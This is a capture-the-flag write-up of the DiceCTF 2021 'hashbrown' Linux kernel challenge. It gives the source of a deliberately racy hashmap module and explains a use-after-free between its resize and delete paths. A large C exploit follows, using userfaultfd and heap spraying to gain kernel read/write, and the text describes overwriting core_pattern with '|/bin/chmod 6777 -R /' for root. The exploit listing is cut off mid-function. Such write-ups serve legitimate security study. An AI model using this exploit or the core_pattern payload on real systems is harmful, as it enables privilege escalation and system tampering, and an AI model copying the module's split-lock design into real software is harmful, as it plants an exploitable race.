DiceCTF2021 hashbrown
Table of Contents
Problem⌗
Environment⌗
- linux version: 5.11.0-rc3
- CONFIG_SLAB_FREELIST_RANDOM=y
- CONFIG_SLAB=y
- CONFIG_FG_KASLR=y
- unprivileged_userfaultfd: 1
- unprivileged_bpf_disabled: 0
Module⌗
#include <linux/device.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/uaccess.h>
#define DEVICE_NAME "hashbrown"
#define CLASS_NAME "hashbrown"
MODULE_AUTHOR("FizzBuzz101");
MODULE_DESCRIPTION("Here's a hashbrown for everyone!");
MODULE_LICENSE("GPL");
#define ADD_KEY 0x1337
#define DELETE_KEY 0x1338
#define UPDATE_VALUE 0x1339
#define DELETE_VALUE 0x133a
#define GET_VALUE 0x133b
#define SIZE_ARR_START 0x10
#define SIZE_ARR_MAX 0x200
#define MAX_ENTRIES 0x400
#define MAX_VALUE_SIZE 0xb0
#define GET_THRESHOLD(size) size - (size >> 2)
#define INVALID 1
#define EXISTS 2
#define NOT_EXISTS 3
#define MAXED 4
static DEFINE_MUTEX(operations_lock);
static DEFINE_MUTEX(resize_lock);
static long hashmap_ioctl(struct file *file, unsigned int cmd,
unsigned long arg);
static int major;
static struct class *hashbrown_class = NULL;
static struct device *hashbrown_device = NULL;
static struct file_operations hashbrown_fops = {.unlocked_ioctl =
hashmap_ioctl};
/* ioctl request layout shared with userspace: src supplies value bytes for
 * ADD_KEY/UPDATE_VALUE, dest receives them for GET_VALUE. */
typedef struct {
uint32_t key;
uint32_t size;
char *src;
char *dest;
} request_t;
/* One bucket-chain node; `value` is a separately kzalloc'd buffer of
 * `size` bytes, `next` links collisions within a bucket. */
struct hash_entry {
uint32_t key;
uint32_t size;
char *value;
struct hash_entry *next;
};
typedef struct hash_entry hash_entry;
/* Table state: `size` is the (power-of-two) bucket count, `threshold` the
 * entry count that triggers a resize, `buckets` the kzalloc'd array of
 * chain heads. */
typedef struct {
uint32_t size;
uint32_t threshold;
uint32_t entry_count;
hash_entry **buckets;
} hashmap_t;
/* Single global hashmap instance (no per-open state). */
hashmap_t hashmap;
static noinline uint32_t get_hash_idx(uint32_t key, uint32_t size);
static noinline long resize(request_t *arg);
static noinline void resize_add(uint32_t idx, hash_entry *entry,
hash_entry **new_buckets);
static noinline void resize_clean_old(void);
static noinline long add_key(uint32_t idx, uint32_t key, uint32_t size,
char *src);
static noinline long delete_key(uint32_t idx, uint32_t key);
static noinline long update_value(uint32_t idx, uint32_t key, uint32_t size,
char *src);
static noinline long delete_value(uint32_t idx, uint32_t key);
static noinline long get_value(uint32_t idx, uint32_t key, uint32_t size,
char *dest);
#pragma GCC push_options
#pragma GCC optimize("O1")
/*
 * Single ioctl entry point dispatching all hashmap operations.
 *
 * VULNERABILITY (intended, per this writeup): the ADD_KEY-at-threshold
 * resize path takes only resize_lock, while every other operation takes
 * only operations_lock. The two paths therefore run concurrently, racing
 * resize() against delete_value()/update_value() on the same entries.
 */
static long hashmap_ioctl(struct file *file, unsigned int cmd,
unsigned long arg) {
long result;
request_t request;
uint32_t idx;
if (cmd == ADD_KEY) {
/* Resize path: guarded by resize_lock only -- the operations below are
 * NOT excluded while the table is being migrated. */
if (hashmap.entry_count == hashmap.threshold &&
hashmap.size < SIZE_ARR_MAX) {
mutex_lock(&resize_lock);
result = resize((request_t *)arg);
mutex_unlock(&resize_lock);
return result;
}
}
mutex_lock(&operations_lock);
if (copy_from_user((void *)&request, (void *)arg, sizeof(request_t))) {
result = INVALID;
} else if (cmd == ADD_KEY && hashmap.entry_count == MAX_ENTRIES) {
result = MAXED;
} else {
/* Bucket index is computed from the CURRENT size; a concurrent resize
 * can change hashmap.size/buckets underneath these helpers. */
idx = get_hash_idx(request.key, hashmap.size);
switch (cmd) {
case ADD_KEY:
result = add_key(idx, request.key, request.size, request.src);
break;
case DELETE_KEY:
result = delete_key(idx, request.key);
break;
case UPDATE_VALUE:
result = update_value(idx, request.key, request.size, request.src);
break;
case DELETE_VALUE:
result = delete_value(idx, request.key);
break;
case GET_VALUE:
result = get_value(idx, request.key, request.size, request.dest);
break;
default:
result = INVALID;
break;
}
}
mutex_unlock(&operations_lock);
return result;
}
/* Supplemental hash of `key` (Java-HashMap style bit mixing), reduced to a
 * bucket index by masking with the power-of-two table `size`. */
static uint32_t get_hash_idx(uint32_t key, uint32_t size) {
  const uint32_t mixed = key ^ (key >> 20) ^ (key >> 12);
  const uint32_t spread = mixed ^ (mixed >> 7) ^ (mixed >> 4);
  const uint32_t mask = size - 1;
  return spread & mask;
}
/*
 * Push `entry` onto the head of chain `idx` in the new bucket array.
 *
 * Fix: the original special-cased an empty chain and left entry->next
 * untouched on that path (relying on callers passing kzalloc'd entries).
 * Linking unconditionally is equivalent for those callers and also clears
 * any stale next pointer.
 */
static noinline void resize_add(uint32_t idx, hash_entry *entry,
                                hash_entry **new_buckets) {
  entry->next = new_buckets[idx];
  new_buckets[idx] = entry;
}
/*
 * Free every hash_entry in the current bucket array, then the array itself,
 * and NULL out the table pointer.
 *
 * NOTE: entry->value buffers are deliberately NOT freed here -- resize()
 * has already copied the value pointers into the new entries.
 */
static noinline void resize_clean_old() {
int i;
hash_entry *traverse, *temp;
for (i = 0; i < hashmap.size; i++) {
if (hashmap.buckets[i]) {
traverse = hashmap.buckets[i];
while (traverse) {
temp = traverse;
traverse = traverse->next;
kfree(temp);
}
hashmap.buckets[i] = NULL;
}
}
kfree(hashmap.buckets);
hashmap.buckets = NULL;
return;
}
/*
 * Grow the table to double its size: migrate every existing entry into a
 * freshly allocated bucket array (a NEW hash_entry per old entry, but
 * REUSING the old `value` pointer), insert the requested key unless it
 * already exists, free the old entries/array, then swap in the new state.
 *
 * Runs under resize_lock only (see hashmap_ioctl). Between the migration
 * loop and resize_clean_old(), old and new entries share value pointers,
 * so a concurrent delete_value() (which holds only operations_lock) frees
 * a buffer the new table still references -- the use-after-free this
 * challenge is built around.
 *
 * NOTE(review): the failure paths kfree() only the bucket array, leaking
 * any entries already migrated into it.
 */
static long resize(request_t *arg) {
hash_entry **new_buckets, *temp_entry, *temp;
request_t request;
char *temp_data;
uint32_t new_size, new_threshold, new_idx;
int i, duplicate;
if (copy_from_user((void *)&request, (void *)arg, sizeof(request_t))) {
return INVALID;
}
if (request.size < 1 || request.size > MAX_VALUE_SIZE) {
return INVALID;
}
new_size = hashmap.size * 2;
new_threshold = GET_THRESHOLD(new_size);
new_buckets = kzalloc(sizeof(hash_entry *) * new_size, GFP_KERNEL);
if (!new_buckets) {
return INVALID;
}
duplicate = 0;
/* Migration: duplicate each entry's metadata into a new node; the value
 * buffer itself is shared between old and new entries from here on. */
for (i = 0; i < hashmap.size; i++) {
if (hashmap.buckets[i]) {
for (temp_entry = hashmap.buckets[i]; temp_entry != NULL;
temp_entry = temp_entry->next) {
if (temp_entry->key == request.key) {
duplicate = 1;
}
new_idx = get_hash_idx(temp_entry->key, new_size);
temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
if (!temp) {
kfree(new_buckets);
return INVALID;
}
temp->key = temp_entry->key;
temp->size = temp_entry->size;
temp->value = temp_entry->value;
resize_add(new_idx, temp, new_buckets);
}
}
}
if (!duplicate) {
new_idx = get_hash_idx(request.key, new_size);
temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
if (!temp) {
kfree(new_buckets);
return INVALID;
}
temp_data = kzalloc(request.size, GFP_KERNEL);
if (!temp_data) {
kfree(temp);
kfree(new_buckets);
return INVALID;
}
/* This copy can fault and block (e.g. on a userfaultfd page) while the
 * tables share value pointers -- the exploit's race window. */
if (copy_from_user(temp_data, request.src, request.size)) {
kfree(temp_data);
kfree(temp);
kfree(new_buckets);
return INVALID;
}
temp->size = request.size;
temp->value = temp_data;
temp->key = request.key;
temp->next = NULL;
resize_add(new_idx, temp, new_buckets);
hashmap.entry_count++;
}
resize_clean_old();
hashmap.size = new_size;
hashmap.threshold = new_threshold;
hashmap.buckets = new_buckets;
return (duplicate) ? EXISTS : 0;
}
/*
 * Insert a new entry (key -> `size` bytes copied from userspace `src`)
 * into bucket `idx`. Returns 0 on success, EXISTS if the key is already
 * present, INVALID on bad size / allocation failure / faulting copy.
 *
 * Fixes vs. original: the original leaked temp_entry/temp_data when one
 * of the two allocations failed, and leaked both when copy_from_user
 * failed. kfree(NULL) is a no-op, so no per-pointer guards are needed.
 */
static long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src) {
  hash_entry *temp_entry, *temp;
  char *temp_data;
  if (size < 1 || size > MAX_VALUE_SIZE) {
    return INVALID;
  }
  temp_entry = kzalloc(sizeof(hash_entry), GFP_KERNEL);
  temp_data = kzalloc(size, GFP_KERNEL);
  if (!temp_entry || !temp_data) {
    kfree(temp_data);
    kfree(temp_entry);
    return INVALID;
  }
  if (copy_from_user(temp_data, src, size)) {
    kfree(temp_data);
    kfree(temp_entry);
    return INVALID;
  }
  temp_entry->key = key;
  temp_entry->size = size;
  temp_entry->value = temp_data;
  temp_entry->next = NULL;
  if (!hashmap.buckets[idx]) {
    hashmap.buckets[idx] = temp_entry;
    hashmap.entry_count++;
    return 0;
  } else {
    /* Walk the chain to its tail, bailing out if the key already exists. */
    for (temp = hashmap.buckets[idx]; temp->next != NULL; temp = temp->next) {
      if (temp->key == key) {
        kfree(temp_data);
        kfree(temp_entry);
        return EXISTS;
      }
    }
    if (temp->key == key) {
      kfree(temp_data);
      kfree(temp_entry);
      return EXISTS;
    }
    temp->next = temp_entry;
    hashmap.entry_count++;
    return 0;
  }
}
/*
 * Unlink and free the entry with `key` (and its value buffer, if any)
 * from chain `idx`. Returns 0 on success, NOT_EXISTS if no such key.
 */
static long delete_key(uint32_t idx, uint32_t key) {
  hash_entry **link = &hashmap.buckets[idx];
  hash_entry *cur;
  /* Pointer-to-pointer traversal handles head and interior nodes uniformly. */
  for (cur = *link; cur != NULL; cur = *link) {
    if (cur->key == key) {
      *link = cur->next;
      if (cur->value) {
        kfree(cur->value);
      }
      kfree(cur);
      hashmap.entry_count--;
      return 0;
    }
    link = &cur->next;
  }
  return NOT_EXISTS;
}
/*
 * Replace the value stored under `key` in bucket `idx` with `size` bytes
 * from userspace `src`. A differing size frees the old buffer and
 * allocates a new one; a matching size overwrites the buffer in place.
 */
static long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src) {
hash_entry *temp;
char *temp_data;
if (size < 1 || size > MAX_VALUE_SIZE) {
return INVALID;
}
if (!hashmap.buckets[idx]) {
return NOT_EXISTS;
}
for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp->next) {
if (temp->key == key) {
if (temp->size != size) {
if (temp->value) {
kfree(temp->value);
}
/* value/size are cleared BEFORE allocating, so a failed allocation
 * or copy leaves the entry consistently empty, not dangling. */
temp->value = NULL;
temp->size = 0;
temp_data = kzalloc(size, GFP_KERNEL);
/* NOTE(review): if copy_from_user fails after a successful kzalloc,
 * temp_data leaks. */
if (!temp_data || copy_from_user(temp_data, src, size)) {
return INVALID;
}
temp->size = size;
temp->value = temp_data;
} else {
/* Same size: copy straight through whatever pointer `value` holds. */
if (copy_from_user(temp->value, src, size)) {
return INVALID;
}
}
return 0;
}
}
return NOT_EXISTS;
}
/*
 * Free the value buffer of the entry with `key` in bucket `idx`, leaving
 * the entry itself in place with a NULL value and zero size.
 * Returns 0 on success, NOT_EXISTS if the key or its value is absent.
 */
static long delete_value(uint32_t idx, uint32_t key) {
  hash_entry *cur = hashmap.buckets[idx];
  while (cur != NULL) {
    if (cur->key != key) {
      cur = cur->next;
      continue;
    }
    if (cur->value == NULL || cur->size == 0) {
      return NOT_EXISTS;
    }
    kfree(cur->value);
    cur->value = NULL;
    cur->size = 0;
    return 0;
  }
  return NOT_EXISTS;
}
/*
 * Copy `size` bytes of the value stored under `key` (bucket `idx`) out to
 * userspace `dest`. A partial read (size < stored size) is permitted;
 * asking for more than the stored size is rejected with INVALID.
 */
static long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest) {
  hash_entry *cur;
  for (cur = hashmap.buckets[idx]; cur != NULL; cur = cur->next) {
    if (cur->key != key) {
      continue;
    }
    if (cur->value == NULL || cur->size == 0) {
      return NOT_EXISTS;
    }
    if (size > cur->size) {
      return INVALID;
    }
    return copy_to_user(dest, cur->value, size) ? INVALID : 0;
  }
  return NOT_EXISTS;
}
#pragma GCC pop_options
/*
 * Module init: register the chardev, create /dev/hashbrown, and allocate
 * the initial bucket array. Returns 0 on success, -1 on any failure
 * (undoing whatever was set up so far).
 */
static int __init init_hashbrown(void) {
  major = register_chrdev(0, DEVICE_NAME, &hashbrown_fops);
  if (major < 0) {
    return -1;
  }
  hashbrown_class = class_create(THIS_MODULE, CLASS_NAME);
  if (IS_ERR(hashbrown_class)) {
    unregister_chrdev(major, DEVICE_NAME);
    return -1;
  }
  hashbrown_device =
      device_create(hashbrown_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
  if (IS_ERR(hashbrown_device)) {
    class_destroy(hashbrown_class);
    unregister_chrdev(major, DEVICE_NAME);
    return -1;
  }
  /* Both mutexes are already initialized by DEFINE_MUTEX; these re-inits
   * are redundant but harmless. */
  mutex_init(&operations_lock);
  mutex_init(&resize_lock);
  hashmap.size = SIZE_ARR_START;
  hashmap.entry_count = 0;
  hashmap.threshold = GET_THRESHOLD(hashmap.size);
  hashmap.buckets = kzalloc(sizeof(hash_entry *) * hashmap.size, GFP_KERNEL);
  /* Fix: the original never checked this allocation; a failure would make
   * every subsequent ioctl dereference a NULL bucket array. */
  if (!hashmap.buckets) {
    device_destroy(hashbrown_class, MKDEV(major, 0));
    class_destroy(hashbrown_class);
    unregister_chrdev(major, DEVICE_NAME);
    return -1;
  }
  printk(KERN_INFO "HashBrown Loaded! Who doesn't love Hashbrowns!\n");
  return 0;
}
/*
 * Module exit: tear down the device node and release all hashmap memory.
 *
 * Fix: the original leaked every entry, value buffer, and the bucket array
 * on unload. Free the value buffers first, then let resize_clean_old()
 * free the entries and the array itself (it deliberately skips values).
 */
static void __exit exit_hashbrown(void) {
  device_destroy(hashbrown_class, MKDEV(major, 0));
  class_unregister(hashbrown_class);
  class_destroy(hashbrown_class);
  unregister_chrdev(major, DEVICE_NAME);
  if (hashmap.buckets) {
    int i;
    hash_entry *cur;
    for (i = 0; i < hashmap.size; i++) {
      for (cur = hashmap.buckets[i]; cur != NULL; cur = cur->next) {
        kfree(cur->value);
      }
    }
    resize_clean_old();
  }
  mutex_destroy(&operations_lock);
  mutex_destroy(&resize_lock);
  printk(KERN_INFO "HashBrown Unloaded\n");
}
module_init(init_hashbrown);
module_exit(exit_hashbrown);
This module allows us to add, delete and update keys and values in the hashmap.
Vulnerability⌗
The vulnerability is simple: a race condition can occur in the hashmap_ioctl function:
static long hashmap_ioctl(struct file *file, unsigned int cmd,
unsigned long arg) {
long result;
request_t request;
uint32_t idx;
if (cmd == ADD_KEY) {
if (hashmap.entry_count == hashmap.threshold &&
hashmap.size < SIZE_ARR_MAX) {
mutex_lock(&resize_lock);
result = resize((request_t *)arg);
mutex_unlock(&resize_lock);
return result;
}
}
mutex_lock(&operations_lock);
if (copy_from_user((void *)&request, (void *)arg, sizeof(request_t))) {
result = INVALID;
} else if (cmd == ADD_KEY && hashmap.entry_count == MAX_ENTRIES) {
result = MAXED;
} else {
idx = get_hash_idx(request.key, hashmap.size);
switch (cmd) {
// ...
}
}
mutex_unlock(&operations_lock);
return result;
}
As we can see, the resize path is serialized only by resize_lock while the other modification paths take only operations_lock, so resize can run concurrently with them.
And in the resize function there is an entry-copy mechanism which allocates a new heap chunk per entry and copies the old entry's metadata (including its value pointer) to the new one.
After copying, it deletes the old hashmap's buckets using resize_clean_old and sets the hashmap's buckets to the new array:
static long resize(request_t *arg) {
hash_entry **new_buckets, *temp_entry, *temp;
request_t request;
char *temp_data;
uint32_t new_size, new_threshold, new_idx;
int i, duplicate;
// ...
duplicate = 0;
for (i = 0; i < hashmap.size; i++) {
if (hashmap.buckets[i]) {
for (temp_entry = hashmap.buckets[i]; temp_entry != NULL;
temp_entry = temp_entry->next) {
if (temp_entry->key == request.key) {
duplicate = 1;
}
new_idx = get_hash_idx(temp_entry->key, new_size);
temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
if (!temp) {
kfree(new_buckets);
return INVALID;
}
temp->key = temp_entry->key;
temp->size = temp_entry->size;
temp->value = temp_entry->value;
resize_add(new_idx, temp, new_buckets);
}
}
}
if (!duplicate) {
new_idx = get_hash_idx(request.key, new_size);
temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
if (!temp) {
kfree(new_buckets);
return INVALID;
}
temp_data = kzalloc(request.size, GFP_KERNEL);
if (!temp_data) {
kfree(temp);
kfree(new_buckets);
return INVALID;
}
if (copy_from_user(temp_data, request.src, request.size)) {
kfree(temp_data);
kfree(temp);
kfree(new_buckets);
return INVALID;
}
temp->size = request.size;
temp->value = temp_data;
temp->key = request.key;
temp->next = NULL;
resize_add(new_idx, temp, new_buckets);
hashmap.entry_count++;
}
resize_clean_old();
hashmap.size = new_size;
hashmap.threshold = new_threshold;
hashmap.buckets = new_buckets;
return (duplicate) ? EXISTS : 0;
}
Exploit⌗
Make UAF and get controlled entry⌗
So, if we delete a value after it has been copied but before resize_clean_old runs, the new bucket will contain an entry pointing at a freed value.
Since the size of hash_entry is 0x20, we can gain control of an entry via the freed value in the new bucket (see construct_corrupted_entry).
AAR/AAW⌗
A hash_entry contains size and value members, so by overlapping them we can build AAR and AAW primitives (see aar and aaw).
Find core_pattern and overwrite it⌗
Although we can read and write at arbitrary addresses, reads are limited by __check_object_size.
However, we can leak an address in the kernel area (see find_kernel_address), and from it locate the kernel base (see find_core_pattern_address and the few lines after its call site).
Then, knowing the core_pattern address and having arbitrary read/write, we overwrite core_pattern with "|/bin/chmod 6777 -R /".
Exploit code⌗
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>
static void get_enter_to_continue(const char* msg);
static void fatal(const char* msg);
static int register_uffd(void* addr, size_t len, void* (*handler)(void*));
/* Print `msg` and block until the user presses enter (debug pause helper). */
static void get_enter_to_continue(const char* msg) {
  printf("%s\n", msg);
  (void)getchar();
}
/* Report `msg` with the current errno text and terminate the process. */
static void fatal(const char* msg) {
  perror(msg);
  exit(-1);
}
/*
 * Create a userfaultfd monitoring [addr, addr+len) for missing-page faults
 * and spawn `handler` on its own thread to service them.
 * Returns the userfaultfd descriptor; exits via fatal() on any failure.
 */
static int register_uffd(void* addr, size_t len, void* (*handler)(void*)) {
  struct uffdio_api uffdio_api;
  struct uffdio_register uffdio_register;
  pthread_t th;
  int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK);
  if (uffd < 0) {
    fatal("syscall(__NR_userfaultfd)");
  }
  uffdio_api.api = UFFD_API;
  uffdio_api.features = 0;
  if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
    fatal("ioctl(UFFDIO_API)");
  }
  uffdio_register.range.start = (uint64_t)addr;
  uffdio_register.range.len = len;
  uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
  if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
    fatal("ioctl(UFFDIO_REGISTER)");
  }
  /* Fix: pthread_create returns a positive error number on failure and
   * does not set errno/-1, so the original `< 0` test could never fire. */
  if (pthread_create(&th, NULL, handler, (void*)(uint64_t)uffd) != 0) {
    fatal("pthread_create");
  }
  return uffd;
}
#define VULN_DEV_NAME "hashbrown"
#define VULN_DEV_CMD_ADD_KEY 0x1337
#define VULN_DEV_CMD_DELETE_KEY 0x1338
#define VULN_DEV_CMD_UPDATE_VALUE 0x1339
#define VULN_DEV_CMD_DELETE_VALUE 0x133a
#define VULN_DEV_CMD_GET_VALUE 0x133b
#define VULN_DEV_CONST_SIZE_ARR_START 0x10
#define VULN_DEV_CONST_SIZE_ARR_MAX 0x200
#define VULN_DEV_CONST_MAX_ENTRIES 0x400
#define VULN_DEV_CONST_MAX_VALUE_SIZE 0xb0
#define VULN_DEV_GET_THRESHOLD(size) (size - (size >> 2))
#define VULN_DEV_RESULT_INVALID 1
#define VULN_DEV_RESULT_EXISTS 2
#define VULN_DEV_RESULT_NOT_EXISTS 3
#define VULN_DEV_RESULT_MAXED 4
typedef struct {
uint32_t key;
uint32_t size;
char* src;
char* dest;
} request_t;
static int vuln_dev_add_key(uint32_t key, void* src, uint32_t size);
static int vuln_dev_delete_key(uint32_t key);
static int vuln_dev_update_value(uint32_t key, void* src, uint32_t size);
static int vuln_dev_delete_value(uint32_t key);
static int vuln_dev_get_value(uint32_t key, void* out, uint32_t size);
static uint32_t get_hash_idx_from_key(uint32_t key, uint32_t size);
static void calculate_hash_collision(uint32_t* out, size_t out_size,
uint32_t hash, uint32_t size);
int vuln_fd = 0;
static int vuln_dev_add_key(uint32_t key, void* src, uint32_t size) {
request_t req = {.key = key, .size = size, .src = (char*)src, .dest = NULL};
return ioctl(vuln_fd, VULN_DEV_CMD_ADD_KEY, &req);
}
static int vuln_dev_delete_key(uint32_t key) {
request_t req = {.key = key, .size = 0, .src = NULL, .dest = NULL};
return ioctl(vuln_fd, VULN_DEV_CMD_DELETE_KEY, &req);
}
static int vuln_dev_update_value(uint32_t key, void* src, uint32_t size) {
request_t req = {.key = key, .size = size, .src = (char*)src, .dest = NULL};
return ioctl(vuln_fd, VULN_DEV_CMD_UPDATE_VALUE, &req);
}
static int vuln_dev_delete_value(uint32_t key) {
request_t req = {.key = key, .size = 0, .src = NULL, .dest = NULL};
return ioctl(vuln_fd, VULN_DEV_CMD_DELETE_VALUE, &req);
}
static int vuln_dev_get_value(uint32_t key, void* dest, uint32_t size) {
request_t req = {.key = key, .size = size, .src = NULL, .dest = (char*)dest};
return ioctl(vuln_fd, VULN_DEV_CMD_GET_VALUE, &req);
}
/* Userspace mirror of the module's get_hash_idx(): supplemental hash of
 * `key`, masked down to a bucket index for the power-of-two table `size`. */
static uint32_t get_hash_idx_from_key(uint32_t key, uint32_t size) {
  const uint32_t mixed = key ^ (key >> 20) ^ (key >> 12);
  const uint32_t spread = mixed ^ (mixed >> 7) ^ (mixed >> 4);
  return spread & (size - 1);
}
/*
 * Fill `out` with the first `out_size` 32-bit keys whose bucket index (for
 * a table of `size` buckets) equals `hash`. Exits via fatal() if `hash` is
 * not a valid index.
 *
 * Fix: the original loop condition `cur_key <= 0xffffffff` on a uint32_t
 * is always true, so the loop would wrap and spin forever if fewer than
 * out_size colliding keys exist. A 64-bit counter bounds the scan to one
 * full sweep of the key space. Also bail out early for out_size == 0,
 * which previously stored a key before the fill-count check.
 */
static void calculate_hash_collision(uint32_t* out, size_t out_size,
                                     uint32_t hash, uint32_t size) {
  if (hash >= size) {
    fatal("calculate_hash_collision: hash >= size");
  }
  if (out_size == 0) {
    return;
  }
  uint32_t* p = out;
  const uint32_t* const last_p = p + out_size;
  for (uint64_t cur_key = 0; cur_key <= 0xffffffffULL; ++cur_key) {
    if (get_hash_idx_from_key((uint32_t)cur_key, size) != hash) {
      continue;
    }
    *p++ = (uint32_t)cur_key;
    if (p == last_p) {
      break;
    }
  }
}
#define KERNEL_BASE_START 0xffffffff81000000
#define KERNEL_BASE_END 0xffffffffc0000000
#define IS_IN_KERNEL_BASE_RANGE(x) \
(KERNEL_BASE_START <= (x) && (x) <= KERNEL_BASE_END)
#define KERNEL_MODULE_START 0xffffffffc0000000
#define KERNEL_MODPROBE_OFFSET (0xa46fe0)
#define KERNEL_CORE_PATTERN_OFFSET (0xb0cd00)
#define KERNEL_START_SYMTAB_OFFSET (0x990940)
#define KERNEL_MODULE_HASHMAP_OFFSET (0x2540)
static void entry_spray(uint32_t idx, void* data, size_t size);
static void* pthread_entry_spray(void* arg);
static uint64_t construct_corrupted_entry();
static uint64_t leak_heap_address();
static void aar(void* out, uint64_t addr, size_t size);
static void aaw(uint64_t addr, void* data, size_t size);
static uint64_t aar64(uint64_t addr);
static void aaw64(uint64_t addr, uint64_t val);
static uint64_t find_kernel_address(uint64_t heap_addr);
static uint64_t find_module_base();
static uint64_t find_core_pattern_address(uint64_t kernel_addr);
/* Add 512 entries that all land in bucket `idx` of the full-size (0x200)
 * table, each carrying `size` bytes copied from `data`. */
static void entry_spray(uint32_t idx, void* data, size_t size) {
  uint32_t spray_keys[512];
  calculate_hash_collision(spray_keys, 512, idx, VULN_DEV_CONST_SIZE_ARR_MAX);
  for (size_t i = 0; i < 512; ++i) {
    vuln_dev_add_key(spray_keys[i], data, size);
  }
}
/*
 * pthread wrapper around entry_spray(). `arg` points at three 8-byte
 * slots: { idx, data pointer, size } (as packed by the caller in
 * construct_corrupted_entry).
 *
 * Fixes vs. original: removed the unused keys[512] local, used char*
 * arithmetic instead of the void* GNU extension, and added the missing
 * `return NULL` (falling off the end of a value-returning function is UB).
 */
static void* pthread_entry_spray(void* arg) {
  uint32_t idx = *(uint32_t*)arg;
  void* data = (void*)*(uint64_t*)((char*)arg + 8);
  size_t size = *(size_t*)((char*)arg + 16);
  entry_spray(idx, data, size);
  return NULL;
}
cpu_set_t target_cpu;
uint32_t collision_keys[VULN_DEV_CONST_SIZE_ARR_MAX];
/*
 * userfaultfd handler thread for construct_corrupted_entry().
 *
 * When resize() faults on the registered page (inside copy_from_user for
 * the new key's value), this handler runs while resize() is blocked: it
 * deletes the values of all already-migrated entries, leaving the entries
 * in the NEW bucket array pointing at freed buffers. It then resolves the
 * fault with a zero-filled page so resize() completes normally.
 *
 * Fix: the original listing's `&copy` in the UFFDIO_COPY ioctl had been
 * mangled into the HTML-entity glyph "(c)", which does not compile.
 */
static void* userfault_handler_for_construct_fake_entry(void* args) {
  int uffd = (int)(long)args;
  static struct uffd_msg msg;
  struct uffdio_copy copy;
  struct pollfd pollfd;
  char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    fatal("userfault_handler_for_construct_fake_entry: mmap");
  }
  pollfd.fd = uffd;
  pollfd.events = POLLIN;
  while (poll(&pollfd, 1, -1) > 0) {
    if ((pollfd.revents & POLLERR) || (pollfd.revents & POLLHUP)) {
      fatal("userfault_handler_for_construct_fake_entry: poll");
    }
    if (read(uffd, &msg, sizeof(msg)) <= 0) {
      fatal("userfault_handler_for_construct_fake_entry: read(uffd)");
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
      fatal(
          "userfault_handler_for_construct_fake_entry: msg.event != "
          "UFFD_EVENT_PAGEFAULT");
    }
    /* Main routine: free the value buffers whose pointers resize() has
     * already duplicated into the new bucket array (UAF setup). */
    puts("[+] UFFD: Deleting values...");
    uint32_t cur_size = VULN_DEV_CONST_SIZE_ARR_MAX / 2;
    uint32_t cur_threshold = VULN_DEV_GET_THRESHOLD(cur_size);
    for (int i = 0; i <= cur_threshold + 1; ++i) {
      vuln_dev_delete_value(collision_keys[i]);
    }
    /* Resolve the fault: the blank page's bytes become the faulted page's
     * contents, unblocking copy_from_user in resize(). */
    copy.src = (uint64_t)page;
    copy.dst = (uint64_t)msg.arg.pagefault.address;
    copy.len = 0x1000;
    copy.mode = 0;
    copy.copy = 0;
    if (ioctl(uffd, UFFDIO_COPY, &copy) < 0) {
      fatal("userfault_handler_for_construct_fake_entry: ioctl(UFFDIO_COPY)");
    }
    break;
  }
  munmap(page, 0x1000);
  return NULL;
}
/*
 * Drive the race to build two overlapping hashmap entries.
 *
 * 1. Fill bucket 0 with threshold-1 colliding keys (0x20-byte 'a' values).
 * 2. Add one more key whose value source lies on a userfaultfd page: this
 *    trips the resize path, and resize() blocks in copy_from_user.
 * 3. The fault handler (above) deletes the migrated entries' values while
 *    resize() is blocked, so after it finishes the new table's entries
 *    point at freed 0x20-byte buffers.
 * 4. Spray fresh entries (same-size allocations) so the freed value
 *    buffers get reused as hash_entry structs -- some old key's `value`
 *    now overlaps a sprayed key's entry header.
 * 5. Scan the old keys for a value that no longer reads back as 'a' bytes
 *    but whose first qword looks like (size=0x20)<<32 | key, i.e. the
 *    header of the overlapped entry.
 *
 * Returns (controller_key << 32) | backing_key: reading/writing
 * controller_key's value reads/writes backing_key's hash_entry struct.
 */
static uint64_t construct_corrupted_entry() {
char data[0x20];
uint64_t* uint64_data = (uint64_t*)data;
memset(data, 'a', 0x20);
uint32_t target_idx = 0;
uint32_t cur_size = VULN_DEV_CONST_SIZE_ARR_MAX / 2;
uint32_t cur_threshold = VULN_DEV_GET_THRESHOLD(cur_size);
calculate_hash_collision(collision_keys, 512, target_idx,
VULN_DEV_CONST_SIZE_ARR_MAX);
puts("[*] Adding keys...");
for (int i = 0; i < cur_threshold; ++i) {
vuln_dev_add_key(collision_keys[i], data, sizeof(data));
}
void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
int uffd = register_uffd(uffd_page, 0x1000,
userfault_handler_for_construct_fake_entry);
puts("[*] Trigger `resize` and deleting values...");
/* The src pointer is the unfaulted uffd page: resize() blocks here and
 * the handler thread performs step 3. */
vuln_dev_add_key(collision_keys[cur_threshold + 1], uffd_page, sizeof(data));
puts("[*] Spraying entries...");
{
/* Spray from two buckets (and a second thread) to improve the odds of
 * reclaiming the freed buffers as entry structs. */
entry_spray(1, data, 0x20);
pthread_t th;
uint64_t arg[3] = {2, (uint64_t)data, 0x20};
pthread_create(&th, NULL, pthread_entry_spray, arg);
